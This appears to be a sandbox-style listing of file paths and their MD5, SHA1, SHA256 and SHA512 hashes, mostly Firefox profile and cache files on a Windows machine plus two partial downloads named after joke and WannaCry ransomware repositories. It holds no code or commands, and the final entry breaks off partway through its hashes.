SHA1 e5e83a61091871f97f70f5dfb7891f036b8d34e5
SHA256 555efa41dce661287cf480f6f9ae611fd0c3b940cd9bdfc1225aa5ac957ffbf0
SHA512 b41c02e1eeb705a9cdd0dc7c13fe010795395f712c44120d7ea0db34e7e0442adf566551f22feaafb21d13d0c78a7204a00f8c85f74ccbb7aeda599ba6c6ce4e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 bc256cde673f64a47ec3da26429c74a8
SHA1 167d9f6503c6f08138e5996fc98b3400c5009a5c
SHA256 1656502a8d5785adac9e95f6110b1cae3691b987b260957974a5f314e62ef85b
SHA512 ee3ccf495a84f831f0d6d852b0c4cfe435edb353fff55e0128a56a4e083adf207d2372d7832cbbb71b58092dbf8188f6a1d99fc971bd4b8ca2d5d4d1904b6f1a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 4c13bb4bf31bec927d7b3e09d0926858
SHA1 8248f46d5fceb13c480f76c79d9ca41deea95e96
SHA256 bef2e0fc0738c82e7ca5563e88d5e666ebe10a7730287751efebef4d88a9df93
SHA512 f1cba3da37740ac4c1f9de58ee29bb2bf19b0ba54ac51553b2fc3fc001cc5163727a34df45e52535af7111f9b7d96d496eb862063ffd4a66c03d5aa7fdec6178

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js

MD5 59c7efb9be731093557a79f43096f4ef
SHA1 a88503c1679501ebf33ff3b09c690622566ed72d
SHA256 7433ede2934df0b7790fe4a027ea87b5555536474f00de665e3cba9c94cd1f2a
SHA512 0276a555928bf47408b045f28adf10fbfa80aecb4e2f41a4fca7ebe116ae5d2e19c7862298b6ca548e2de3c076ea0424e4b171f3150bfc4ecceafbde1148fa63

C:\Users\Admin\Downloads\You-Are-An-Idiot-main.j4SoN6dR.zip.part

MD5 7cae6b379184f1cc5444ca2fc9a8ec75
SHA1 9a68fb4fed6c6f633275480ac481b7d24a1e60ad
SHA256 4b6edb96987da0a7714e705a7af8516ee7167c8a616eff6eb3ed9e54f6d02ee1
SHA512 fc81537d3fa0aa4fdc56ebcbc13bc43167cf1cd5424077c65292d7c86dd1e7aa11c44a5c78d8ca6fb31d942c034c1a9ee309aa8ee8a75a39dea0d3ed65790604

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 a44bac652141a6dbfddb7b3a1fd7e89c
SHA1 bda3bb835391b0e1c197c8ab2ebe27df97e0cf8d
SHA256 4e532dd03c9c719436be85cdb8aa1653405f861c1e83c7b4556cd1cb2dff7d8b
SHA512 432d529401b4d192d241124a79fc1b57b5e7669fc895cbd00143334c61d233b8431adbe86a6a4f39c3b92b6098319efdca3d756f1e393b0d60e25d7106491542

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 6d4114073fb273fa337a3a3b14b61dae
SHA1 f0f44d3af70d3c8c551d601074642e031d001e91
SHA256 b9e585217d7b7f8a1db3f509ab45ac7bc0981b9824259ae728e21e3af8c26b62
SHA512 35fc4c8ddb8fc5b1f5d862724051159d6d8746a50f9421d563f776c57f585356869c7277ee746a23365e046af476b720f8ff8464952886877bc59457d6467ca7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 5616d5350be686ddee3d57b2e3ac20cd
SHA1 b7355dbeb1756a11b15cd81e21a5c625cdad50ab
SHA256 c13b5f108ed0f2460206c76968b8b7c01b4712a56d9f3341c68a1e037228aa49
SHA512 854b45c434c9c1747f075b045498da1bd03f2494e506a52015c65cf8bcaa28e54d8a5df000bbfa7a86a51f62e84f9e6c2dd179c6b2c854806899f28745cd9263

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 96f35db267072549b2b076e73ec8ba21
SHA1 e1a122a862cd421cda6d92d771fd558691b7b28d
SHA256 2720a17738533021877ee3006cf61e879c060bcdcbd62c575b2c0aca0141fa60
SHA512 3629c2b2615ca0b3ec83409b91b20b1965cfcfe4a9cf92bbaa5878dbbee0ff28928a11fa9172979ad586b5ceb823bb422cd71d92eb20cbef7be6445789fb3369

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\79679B23E6BBEB689E1C79E27C32C20C5EC9DF47

MD5 7382ec99f3cdda1d01d29e34ee6197ce
SHA1 0b41b3c41f1a251c35e8ea4d91e9ce48da9717f7
SHA256 b9abd60671e293430670344041e90806fa26504c91a3cb5c34a756c7d38ca318
SHA512 aade0d0fd69c2cc1c3a67116e0f84b3308ad68d3207a20b853d192af82042954e958d35fabf4f90cf0664ea1c4c1f9805d1bb1510a4d578725f58ecd8498e61c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 08759a0a85eaac39b9a7f2bf57090fa8
SHA1 ba0d658af52d19aeb087f71a2520f8e21f99d9e1
SHA256 642fd7bff09048403f360beb88c68b3e831c50e72e0a857b9e7a3f607345416e
SHA512 71bcc4e46e77c65a58fb4d860ae703235bc42392fb3c5f332f2470bd5c74c639b5d1afdcb31ddc25e578acdd2eea2c47d9cc39db22879c747319ab16857a6bf4

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.UDZVBJBP.0-master.zip.part

MD5 017f199a7a5f1e090e10bbd3e9c885ca
SHA1 4e545b77d1be2445b2f0163ab2d6f2f01ec4ca05
SHA256 761e037ee186880d5f7d1f112b839818056f160a9ba60c7fb8d23d926ac0621f
SHA512 76215a26588204247027dcfdab4ea583443b2b2873ff92ad7dd5e9a9037c77d20ab4e471b8dd83e642d8481f53dbc0f83f993548dc7d151dead48dc29c1fdc22

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore.jsonlz4

MD5 8c49ac112830cea49fbc36e87f2e7a64
SHA1 5d765c172eceb3b72359cf43a875e7df0377f3f9
SHA256 c331d3888bb6263a9076a19d7e81d09e0408ead4ac082c363d6f0524176cfae8
SHA512 f74b89685ef12fc70b7e42106d69a001d39dd0b26ceda9cacf1e0c43651013be82451a3f072b70e1e7bc3a3e8b6012ce4e5137e4428a5aba54bb6df979a20741

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js

MD5 80ea913f0ea5b5366fb75c482b310e74
SHA1 633651f54076bb8699574a65323da3969bdac9df
SHA256 7ced13a228c3109d8ca8ef4f84e23802939d14566eacd05f1c0593f8e43e6cb5
SHA512 1834c7d78aab468b77f13bbce9d0abdadc98335d3dd99ed9507acb669124149f215ff874132c864a7de53cac4445649e4f23ba3f1157bc16ae04aaa93d0acaa6

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\startupCache\urlCache.bin

MD5 1545a3e921a3098b76cf6cadccc4ae35
SHA1 1d67d3f30d70cc8f630fa7efc31bc55e54e56665
SHA256 19984a956bb9091780a609c5bfea2a29c9dcee058ca32ae715392eef6debc027
SHA512 fa364733cf0fa48126ae3b37cafc72b19bc7b8506cedf94f77fff3883de620b5f3402933a1cbbb26abc0ca18651000db882bc4b2c21417bda9c14c4929811ce8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\xulstore.json

MD5 58e240288763218d12bf235d34e5aee2
SHA1 89135494b57f590011c09668dec3b90d2c5ee9ae
SHA256 615f80e71dfde24711e7fefc1b7959f7592c5e5cf9ad0f3aecb4235b93187176
SHA512 caed2638902987aead199e73cffb90881bf245bbb616cb38c46b281d4aaaa54dc20a54e9bfe17a8d6e68847394c113fb7606e94b64f44ab0b52bf7846f26e936

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\startupCache\scriptCache.bin

MD5 81dbbb72f05c9543ae965e281f7e49bc
SHA1 14c37d4bcbae9f3b93b84ed716ee265766511b16
SHA256 d0f18173bc0f13c6c3e8c469f66976acd7679bd18f37ed01373731750ec662f9
SHA512 5bf8d307e29074afb24b43b08cba0ffd2f34b06bd284e0d901a827aedb7d48f9fd5bd0bd9b68453a5bba74b97f0c79d9a0b10143de244706771ea74345113f52

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\permissions.sqlite

MD5 2a0d67d2080630ecee86fd48bb94e883
SHA1 39c15e5f612a901ef40c5ba09968ca82ba50da60
SHA256 ce9069eb3b1636c59ea16404fcf06789b722fc3c3c87205fd099839a3e1c6fdf
SHA512 0f8f546591e236e9a563ecc83f6ea6127d7926ba1e71d7b75e51c7f657db3e1b6c2d9190039a1994532866d060af5dac1502e9bc0d7c56dd41554488005f2b81

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cookies.sqlite

MD5 4283cd67162d87d0983c4c9860b39fc8
SHA1 8602315b7625f8de99c2ca228393c050c2987799
SHA256 9f0c8accedfea2f72a35f16a72af6fecdabd729adae04bb2e1c78f268240e446
SHA512 773a42b2e1c4e710cce0bbce7f531e6c146c605f35ec49c019796a30cb7c69c3eced5e6ffb651f4eb841f690d692330381c4637e3fe5585127400ae113eca9e0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

MD5 ea8b62857dfdbd3d0be7d7e4a954ec9a
SHA1 b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a
SHA256 792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da
SHA512 076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json

MD5 362985746d24dbb2b166089f30cd1bb7
SHA1 6520fc33381879a120165ede6a0f8aadf9013d3b
SHA256 b779351c8c6b04cf1d260c5e76fb4ecf4b74454cc6215a43ea15a223bf5bdd7e
SHA512 0e85cd132c895b3bffce653aeac0b5645e9d1200eb21e23f4e574b079821a44514c1d4b036d29a7d2ea500065c7131aef81cfc38ff1750dbb0e8e0c57fdc2a61

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage.sqlite

MD5 42a8ac62d6df0caa5db397589bbdceff
SHA1 29eaeba053a73d1f2d74ae76ede8e5d1293451ee
SHA256 543323ca552b9ddde17bb9c3c1f6d1bb2734543ad54df1ce1b48d2357a46806a
SHA512 49e778f718727f8dfd5fb2e263f7f7904bc53a9656258d8b08c8bb953e4423f5f55fca8b3831784757f707b1fc996be83bef4874d298327a2551dd438bad79d6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\SiteSecurityServiceState.txt

MD5 172feb55c117f905f3f3e3e1e0109b8c
SHA1 cb2363d405510f5bbdb08ce28b39728b0bf0379b
SHA256 85c0dfdcad23dff3a057682fec8f914a85f458780de0d7a061e9d59314c0fb03
SHA512 a9c02350a89b0be7ed1b2cf442f6fd3301b7284e7062b70173b666698dcae53f0d330563751de77cd4dcf59042fb2eac85d4378e451591520ca04f91b1b4f00e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

MD5 c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA1 5942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA256 00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA512 71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cert9.db

MD5 998b29d9a959c132009411868a19f906
SHA1 c38fd4bc4778c72600f26cb56934346f21155c7c
SHA256 26496f558654ef30b3d536f7373691a5980a9b3cfbd1fc44668e008262e9806b
SHA512 d1e2825dc256b07329e0766b6245b83077b830b9c7e7e5b1a580bf934613b881ab625a6aa93ae46d73c88c0ea082ac2c97706a809faefac5e68fc8bc594dab7c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite

MD5 ef01614d25815d9f71a42d97af6f7f86
SHA1 2bc05e164d8da43f9e13e0014f1d39c664331eed
SHA256 3da0b21c4ff52c75078ec41706ee5cf070dd4c2ca54a017fabd6038318613613
SHA512 9b4f2ccd2885840acb325e2c25c118b83674e0143570ffe238b840a96dbb9a8a99d1d9bc10e9813fc02cef7098313b7bc0a7f0396616472c0a78f1db97b9572b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\favicons.sqlite

MD5 c37ae7dd9b6809440b3b2b7c9793ed8d
SHA1 8aa5b7a50f56ff401207a381470a7c4a86a4e660
SHA256 30e33d0a6f7305df7b62a56b54f0b18de6b5d93b18aa9c9529d288673d4b62b0
SHA512 2bd2d71667348519f777da79afb519f1c7d523da52ec728c15d9cce498e4f26b29e86085da929d7f608fd79921c49f9cffe625642f44d05729522ba95b15d1aa

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\places.sqlite

MD5 00ad9566a01601e4cd2e4b5cf4746b1a
SHA1 a33edcb0d2bf8b30e63865abf87766c9a10f0019
SHA256 dabfddac053d65cb7be17921b8c16ef16a6326059b691a8cb12948a99d0a990b
SHA512 b05b770ceb408df77b498df4d81d1397634fe0073ab4a4c099e71763506d648e2b5a947102cc88f33805ffe2a1541722c58f9728807e8dc4056c92508634793e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\pending_pings\1eac24f8-1158-4ba8-a197-06761f26277c

MD5 ad448a2b4c7c041002a3ad8baccf76c9
SHA1 ccfa0db204e287e4a7c0feddeab96edcc4837451
SHA256 bfb30d2a4faf84aa3b7c24db5c8fb84f729ee49797c717e33e444eb6970eb83a
SHA512 cfbf7d21083318ddb094fa994bf8cb11475e1b767ae362a4bb7e137dad67a09711fe75461e5c1a0fe93b14a2f219f7897ccab402636ec9ea85273e38c030bd59

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\6D89348819C8881868053197CA0754F36784BF5F

MD5 6e61e1c340dccc6d4776b27d7bb0188f
SHA1 4c61bd04e0a1ef0e9206c9a5146450f906c51fba
SHA256 bf7680de14c4defa1c04f6effe0bb5dcc8a790ae1ca85af70d764740f04e9c2f
SHA512 fa1dd2a79cd0bb7b7beb7fe5550b40c24dc02d85440037dd22571b0e6b2de59426c1a8f07dfa73b80600e8a7f1ef5f972001b8e86c487072a276c19dc3500ab3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\AlternateServices.txt

MD5 421a3c678023fd22920e78c05dbae69a
SHA1 88f8cacbf8139f7cc7e78ce6d14936716e86a41c
SHA256 0c756b584bba58786d068b4cdd0695d0bc0ea727c04dd138ba71566499ff6488
SHA512 49fa25000f8c4bfddc7863485ebab7ff3eb3a13872276f043346ef6c06fea1baa32bb7fcc740e5559f64f0ec4a675cbed324689cf8c3d9d6ffc6fabb2ab7eb8a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\pending_pings\d227b851-73ae-4ece-8227-b26196b25836

MD5 637521c5d88f6dc7f7400ba036c5c9e7
SHA1 0eb19390235be90a42304b1d41cdf2340662ef34
SHA256 273541c8626d153dd16c03cbd63ad6e2f1b7ec3de9ee5029770f89a0fd4ec5dc
SHA512 33852d9a369a5f3db1ef3099ba50d45d05b2afb513cb52b152b109072b32674a572733b1f974fca7e0508a388442079ab6b235ce34362711be93edc5d56a6a5d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\protections.sqlite

MD5 49397db0486dc59d607907a086f40c9b
SHA1 08742ce9db9569062def08e99eea8470702feb7d
SHA256 890033ea279f13478e655150a823a5f84176d2f8f2ec3724dc61dfec775707c4
SHA512 fc8dad1ae2215cd96c41bb3e683670bb9138467677da46c19d1e58972775842a995b70123c22ea1efb659d043f5116d0c9dca422035a6646b35f81033c9f5f53

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\db\data.safe.bin

MD5 aa15303c8ecf25eec4ee7004c7facd9b
SHA1 0c1c80defdef0c7b6f93f5fab8dd0eb590a140e0
SHA256 be8e569e04d0286244f4ea224733f96c01bdfe68085d2dc780106ef9c0dc41bf
SHA512 cdc5d9637cf530f20996fd6f4bf8f4a4a11d772a8e388216ec05d660f2a32bc17f455ed09903b6de346dd4814d5574fbda96c557f3d6f897b993788c70d5b388

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\events\events

MD5 09a2c4d7472e5a3edcee9f141075a3fb
SHA1 8660e44d4203940a6019ca6f4e7616548852dfe2
SHA256 8f336f0c3c46a0cdcb95b75d1a95533b59c5bff4da51636cc3ef5be8bb2faa23
SHA512 6d8cc9151fc62d291ebfb2ab12b35a633bad464507b2adeef25eae62b4866fe27427b7ccf80f163e2d8f945b75c99a5f443ada9e0e2552853f95f5614ebb5fad

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\6AC9BD0802E051FCD579CC69A96979DE29682F3D

MD5 3c51fd2edbf1c1ab6a4110b9ada9575f
SHA1 bc8e01940af8ba57f5b022af0a38aecd86d68303
SHA256 5fb1dc1ad3bb0642daa23ee0e61a418bb3858287d5a5379c67bc66908f2887b3
SHA512 f418d57f789803e4a2f11c4de88d5ecc0f83020b56dfc50b65e21bab83a9c5ea1d4816ea4be3c0a2e62fa2e2b64326d3d2462d1494748e2702fd50ed192188e4

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\A4CFB34965A084CF90916E0D471F850E35DB6F1A

MD5 768f5e6b1cd00c5cec590209918503a7
SHA1 f0ff66f16cdada976e37217fd427bc55a6959841
SHA256 ce81bb297c95c7d16a4ed9c475a1a7dbac39d9244dcf3b4894ad2a312eed12a3
SHA512 a7c20acd67e762387adaed332567f4152bb3eea9fd09dfa915cbbe3865170362419d0d2f388578f253ba069956bfb42fb4ed63751a6b3857b85ddcbd66ed6d4c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++github.com\ls\data.sqlite

MD5 d872d02766aa5fb12f723e087fe20d64
SHA1 9e1bcf9533a113826fdae092c39ce9b92b4caf34
SHA256 211f238c00f0120c3d2ecc27076ec2c9357fb402d8ec0ba306b91e5971caf057
SHA512 f9c5399572737b7911dcf0a3e167d41d3abee297d408110e0e89aa45999e579c7b6c58ada585ca72fa3a396cbb88da5b1e32ad07b1dcb468d0b4511e6248e44c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++github.com\ls\usage

MD5 c17e2755e3f942987fb5ac4ff4846331
SHA1 874087563e36d1176b1b10ca426ff10acebe7827
SHA256 809f108d5b50aed275f14f0b27cb8afadf73dc37841efb6c0e94eb28481ff263
SHA512 458cb9485f0ecbad42faecc809b9b919ba3003405f79fbf271c9da80fc7d800bb67e4c4e54f2719935a491bb3ac8f2392b342dd2ce171211545f3e5d6d32a4f7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++github.com\.metadata-v2

MD5 31da86d61375faf4e9cdb83c82902e4e
SHA1 93a5ecbbc47674f82813bad01bd8a691c6c1f7ad
SHA256 2d3757475a13e0a2b734536d39ae1489e31a11bad905dbd59f6f08eeb873a5d3
SHA512 eeece39b47be016c40977247048377899dfc9d0bbad47b332036de4dcb4419b505cdf3a67a1e110f010c19c83967f7342c8a2e2316b17a9f9ff196af7edc0020

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++www.google.com\ls\usage

MD5 512e743bb545159cb1d486968b533343
SHA1 944d41d0af9101dd61980d912e01cfe847291251
SHA256 4b0b002f2882a7813f745491d12cc037ef7399d877b31505589ac0a2d623a555
SHA512 4c4c095daef76ddfaaf9ef92729508681d3073e38ef3c1cff1dcc944400e48da53fd863163af81df54ca5b945632f0a23ae8d297b44bc10442f36f28080faab9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\5F4909CBE225CE96A9AB3579AE72E6ADA89428D9

MD5 09d81961ac0f866aea82bd1f2ade3ebf
SHA1 90e4d873194abcb629c715ecd76d871d389bc6fc
SHA256 ea36ccc8e18f1896cc53b10025229d219279e7c5f5299d275fa260efc0bac5de
SHA512 75567770ed6cd4e3cbab0e019a7f47804b58b2c79ffe8cbd7e13403a1fc333cc8ff56baac12cc6299eaf50b776457df0cb171491dc1460c12fceeafed32cfd69

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\1BAACC87E20392184398D4457610FD10EA048180

MD5 b17431df1edbffa5ad0e4feb83f5278e
SHA1 00d11f00951b8c3d2a78022385cd4a63846b5c87
SHA256 421aa1f3cc6936bebd33549c6bfe1538684b295af21712f817cffd391b7b516f
SHA512 7c6993c063d0c0c4e771cc67e6d89cb7efb60599c242c5cb6c75970247d6205b92e2e9e50bc7639a8aec5362d93a18105939f298b45b016d4a7c62fa0362a979

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\28057EBB0875A1D95314E5D3D15B243F03E4AAD3

MD5 2c34728c8f15bff910d9db5d94c2c08f
SHA1 57cdc6cc6eb66a500da1e3d0c91f44707e19afc3
SHA256 5f3ecb707f267453848d6bff98a4a92c55f713e9bcc11d846685d3e162ed66c0
SHA512 0f967737efb34d6c80c22970a6ee5acad4820866ccc6b8dde7e0844fef0e46e6fa787acb4fa4df382062048a6184c577ffdfe0a6a13ea1e7dfd763f0bd1c7f5c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\3281DD4C79ACB61B312FD94931181EE61FD498DC

MD5 7cc7c0d965fbe9b353573fa87128437b
SHA1 7b24f38e98bfacc61c6e37a5771428fd18b86ac8
SHA256 bdf03ba42ebd18fe8ba4623ece678edb00041be29df1b0cbf764fc465d3c3478
SHA512 f8d7c31de3ef8cc5605d1d0538beb2967d784c2e1c92eb2ce96c57e7619f20866f1778e87e595e9e260aa7d247b1aa67fb1d81dfe341108f26f4d81b570e6ea5

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\549C94847E35BE89DCE95DF86EA39378F22E5078

MD5 be3f00873a958129689b826f2eb259d4
SHA1 8d771bb8ca492e24a55b4e627dd692d981ad56ef
SHA256 09bff034e216bfa3abe74be9762b59ef40fd83c9aef02db7f0af5ec26f759563
SHA512 8e7263cc9bccbdb93e161f22f3da115562fec667e67f9c9fdf1cfe533df8d64d57483b92de12fcd061d3a553d5659486e3b05f2369c6d649d8d50ce97107cfd8

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\2492994A253B970917AF5CDF605580B1C2DC16A0

MD5 c7c5f38c56bddc0bdd2880c4b7244503
SHA1 ceffb4fd2714e0997bb873d5e67f08a43b65362e
SHA256 6c357ef648f280b14d145f4ca68c1514a9f69117b6678072205ef3260b04df89
SHA512 a3906588720dae3c2696fd7eb1376268c8c541b5c1a3dae2423fa2a3b49babebe8212c9b0cd55aadaba3fc5852504907eaf5bf338b4f6a03ee13dffaea2b3f67

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\C5EE5FE6568BA9974B07449A0C19B89535148210

MD5 f2f5bc0b3616348c586638a5d091b960
SHA1 0f1785b06f5c96f0225099ac056e03db9afd34b6
SHA256 1c2a0ecf4d524b5af881f1e3831f31c636225d9728a4f06a9c2d58e5be28e9db
SHA512 7c4ef4e89338718ab178457d3fff1abd19ead16e677f570351ea6e7323355e08a3e27961e8bf5383a22b5bbb7be78f62864c0b9f21c54bece5956357bacfc3da

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\E127E5C228FFFFCCA2BB5B85AA302A961863F2CE

MD5 2f7860d3369e94e98827d3dab0741e62
SHA1 2c5d137b52ce1be5e1e732bc194116090e3bfb9a
SHA256 df4bd41272a43a9d80865e8db051b23c14e03b438155d1e043a2edc3e2985a3a
SHA512 d7c29d611dad23772c633a0b3c6e74febdb1f6fd428eac126183d95de23745cde488dd07bb38dfd6ce9750ebedfbf707cf653603b2f50ca9b95e501ad9b00793

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\D207CA89781848E7ECA4C658F22D4AEF1B168DD3

MD5 1d5fc8c6999f3e5d5efcb41a86973232
SHA1 12b918295166932f5a69a29a3a3212aa663e70ed
SHA256 32dfaa2c2478bd1db81a2db3e960d0562d88f63c45eeb337e880613a6e2cc541
SHA512 83fd6857bc5b9d72071eaef250cf4fb7d58555009d8bc11dc9b3f5c5de393ece13e086cbb488b1cb92c4bdb2e4aefdf0237395d015d6fc403507bf88782eb393

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\DAB5102FC101D7CF236AA0F7F0A1FA0C327821CA

MD5 6e81176dac245b00605c37f46d89e9b6
SHA1 26ace7c9d86ca7ef5c7f65440628489a80a6682a
SHA256 e828fa3491a79cd682b8e01452d0f0dde6305258829df68d38b39c6791d5db3e
SHA512 682be74b2aece527025d951565ccb041e42e69a5c6443005919810f6d95408e53204c03b5f618aabfc8f1a257550943f7bcb98f8727149b3172b94fffaee37ea

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\E8491E9F604125081439FF22CC81BD4ECEAFB687

MD5 4276b2b095b017cbf87e4e5dd70bc8fe
SHA1 fccdc4e5bc7e261686bbd789034d90ed31a7a51e
SHA256 2665d80585ca6cab383a49d25e4089d5960ba1819e9b2f1682ca1eef99df57b1
SHA512 df6cd4a29e89704874ba2544ba18c9173f9f26ff9f8d7b9afd209994f9e38194283908222a94cbfff45542115e0de65817fb3924bd477995f8e82b5870f50447

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\EF099C91F6C614FA770541C1821F5CABA7B41AE3

MD5 032c48ebf28cf8f95c752e87e06e53cf
SHA1 02c74d5b2073e809a6b8a0791424aaf0528514c6
SHA256 2975d22fb103fdc0616f10be1648c4bdd249955265ed22dadab6dbb0bedfbdb3
SHA512 12e40badd2a9680283b15a36279664a5f97dee9f111898d78cce7fd42732ce35a4757aa789a72d7380040c1452d8beed59a208f5eceec89aca847bc36cdbac35

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\386EAC11CA4B921A58AF901DCD97B7FA5108EE6F

MD5 a496129da5a29acbb6d98ddf6853e928
SHA1 cdb3ec36e7ae658b2b02c1fdd736f4cf9c12599c
SHA256 5b8c1a32ed4e1101a1de1654dde0786999b9d524f7a5a8f7a797ecf90a1fa78d
SHA512 ad9ded8bacf1ba35445fb83ba52e8372a8cd850a451ea395d2e74f8b7f41906a764170b8d514bf1b03f965282e9d7aed5f1000c893e7c1f39bee5ebd90587719

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\25E61D0F193C12CBBBE09A429B66070577263AAA

MD5 6afeb01e15792a831327e79e08599b33
SHA1 9bd8c11fe42223332d7d194f89f4d21d6237e5bb
SHA256 3f23a1e8d39cd4a6e55e850df0393e86fd053e2a0a6340525402fcfdcd3df029
SHA512 c705994a8f37504c35392231fc44d0275b299e369dc631c0fcdae3500877d6f21a77b27d73ecae5213ae85df2e1759fa791c60d74789f9c9ec8bd53cc1506f2c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\ADE37C375F37BA84A38CAED399A8A7D861D9CE21

MD5 2f0513e35aa4bfb1a9a1e20b217c0989
SHA1 df25439d5b1688af76553bcf17a62f2d18cc240c
SHA256 21f8e20a5bb175faa7e2feb30ff31852765088387642c44fe8b9734108ca45dc
SHA512 7b93ca9b446714819590fc57604485ff324552325365f152f8a536354febfb818b972c69ef897513104b198f47e0485fb2a37e759676458f771779fd00749025

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\68CD13CDE99B33434CC16167C7B0B073A64EC360

MD5 378e7876d85d4a72b9a7e708a52df379
SHA1 a933cfe0997e71d5c81382434e01158eccbbcaba
SHA256 097c5e69b4834aa8b87306d7eea8773bead4aedfbd98a8338cd60c098019f4ee
